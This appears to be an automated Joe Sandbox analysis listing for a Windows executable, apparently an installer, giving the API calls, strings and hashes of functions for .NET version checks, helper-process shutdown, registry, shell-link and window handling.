Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69

Function 00458B78 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0

Strings

.NET Framework not found, xrefs: 00458D3D
v4.0.30319, xrefs: 00458C11
v2.0.50727, xrefs: 00458C7B
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
v1.1.4322, xrefs: 00458CE2
.NET Framework version %s not found, xrefs: 00458D29

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69

Function 00458164 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0045819B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
GetExitCodeProcess.KERNEL32(?), ref: 004581D6
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239

Strings

Helper process exited., xrefs: 004581E5
Helper isn't responding; killing it., xrefs: 004581A7
Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
Helper process exited with failure code: 0x%x, xrefs: 00458203
Helper process exited, but failed to get exit code., xrefs: 0045820F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A

Function 00453A44 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7

Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
, xrefs: 00453ACD
RegCreateKeyEx, xrefs: 00453ADF
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69

Function 004950AC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234

Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353

73A25CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A

Strings

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 004951E3
STATIC, xrefs: 0049516A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 170458502-2312673372
Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8

Function 0042E340 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0042E3CC
Locale, xrefs: 0042E3AC
kernel32.dll, xrefs: 0042E364
GetUserDefaultUILanguage, xrefs: 0042E35F
mVE, xrefs: 0042E3FF, 0042E407, 0042E412, 0042E434
.DEFAULT\Control Panel\International, xrefs: 0042E394

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
API String ID: 4190037839-37397897
Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59

Function 00462118 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00462124
GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
GetWindowRect.USER32(?,00000000), ref: 0046219E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC

Strings

MonitorFromWindow, xrefs: 0046213F
GetMonitorInfoA, xrefs: 0046214C
(, xrefs: 0046217D
user32.dll, xrefs: 00462133

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A

Function 0042EFFC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F008
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
GetWindowRect.USER32(?,00000000), ref: 0042F082
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0

Strings

user32.dll, xrefs: 0042F017
GetMonitorInfoA, xrefs: 0042F030
(, xrefs: 0042F061
MonitorFromWindow, xrefs: 0042F023

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99

Function 00455A80 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 243comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
SysFreeString.OLEAUT32(?), ref: 00455C47

Strings

IPropertyStore::SetValue, xrefs: 00455BC7, 00455C13
IShellLink::QueryInterface, xrefs: 00455C6B
CoCreateInstance, xrefs: 00455AF3
IPropertyStore::Commit, xrefs: 00455C2C
IPersistFile::Save, xrefs: 00455CC9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateInstance$FreeString
String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
API String ID: 308859552-2052886881
Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59

Function 0045833C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02133858,00000000), ref: 00458399
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000), ref: 00458475
GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000), ref: 0045847C

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

CreateEvent, xrefs: 004583A7
TransactNamedPipe, xrefs: 0045840F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28

Function 00455F18 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

GetProcAddress, xrefs: 00455F53
LoadTypeLib, xrefs: 00455F9E
UnRegisterTypeLib, xrefs: 00455F36
ITypeLib::GetLibAttr, xrefs: 00455FC9
OLEAUT32.DLL, xrefs: 00455F3B
UnRegisterTypeLib, xrefs: 00455FFF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768

Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00416E23
SaveDC.GDI32(?), ref: 00416E37
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
RestoreDC.GDI32(?,?), ref: 00416E75
CreateSolidBrush.GDI32(00000000), ref: 00416EF5
FrameRect.USER32(?,?,?), ref: 00416F28
DeleteObject.GDI32(?), ref: 00416F32
CreateSolidBrush.GDI32(00000000), ref: 00416F42
FrameRect.USER32(?,?,?), ref: 00416F75
DeleteObject.GDI32(?), ref: 00416F7F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00422243
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
